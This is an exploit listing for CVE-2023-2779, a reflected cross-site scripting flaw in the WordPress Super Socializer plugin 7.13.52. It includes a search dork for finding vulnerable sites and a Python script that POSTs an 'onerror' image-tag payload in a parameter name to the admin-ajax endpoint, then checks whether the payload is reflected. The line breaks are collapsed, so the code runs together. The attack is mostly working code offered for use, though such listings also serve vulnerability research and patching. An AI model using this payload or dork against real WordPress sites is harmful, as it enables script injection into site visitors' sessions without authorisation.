WordPress Super Socializer 7.13.52 Cross Site Scripting

# Exploit Title: Super Socializer 7.13.52 - Reflected XSS# Dork: inurl: https://example.com/wp-admin/admin-ajax.php?action=the_champ_sharing_count&urls[%3Cimg%20src%3Dx%20onerror%3Dalert%28document%2Edomain%29%3E]=https://www.google.com# Date: 2023-06-20# Exploit Author: Amirhossein Bahramizadeh# Category : Webapps# Vendor Homepage: https://wordpress.org/plugins/super-socializer# Version: 7.13.52 (REQUIRED)# Tested on: Windows/Linux# CVE : CVE-2023-2779import requests# The URL of the vulnerable AJAX endpointurl = "https://example.com/wp-admin/admin-ajax.php"# The vulnerable parameter that is not properly sanitized and escapedvulnerable_param = "<img src=x onerror=alert(document.domain)>"# The payload that exploits the vulnerabilitypayload = {"action": "the_champ_sharing_count", "urls[" + vulnerable_param + "]": "https://www.google.com"}# Send a POST request to the vulnerable endpoint with the payloadresponse = requests.post(url, data=payload)# Check if the payload was executed by searching for the injected script tagif "<img src=x onerror=alert(document.domain)>" in response.text:    print("Vulnerability successfully exploited")else:    print("Vulnerability not exploitable")